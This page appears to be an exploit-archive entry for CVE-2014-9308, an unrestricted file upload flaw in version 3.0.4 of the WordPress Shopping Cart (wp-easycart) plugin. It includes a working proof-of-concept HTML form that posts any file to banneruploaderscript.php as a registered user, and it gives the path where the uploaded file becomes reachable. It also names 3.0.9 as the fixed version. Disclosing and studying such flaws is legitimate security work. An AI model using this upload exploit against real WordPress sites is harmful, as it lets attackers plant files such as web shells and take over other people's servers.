Skip to content
cyberexploits
webappphptext

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload

Published on 2015-01-08

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/35730.txt7eac4c3a
raw
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload

# Date: 29-10-2014

# Software Link: https://wordpress.org/plugins/wp-easycart/

# Exploit Author: Kacper Szurek

# Contact: http://twitter.com/KacperSzurek

# Website: http://security.szurek.pl/

# CVE: CVE-2014-9308

# Category: webapps



1. Description

  

Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php



http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html



  

2. Proof of Concept



Login as regular user (created using wp-login.php?action=register):



<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">

    <input type="hidden" name="datemd5" value="1">

    <input type="file" name="Filedata">

    <input value="Upload!" type="submit">

</form>



File will be visible:



http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%

  

3. Solution:

  

Update to version 3.0.9

https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
View on GitHub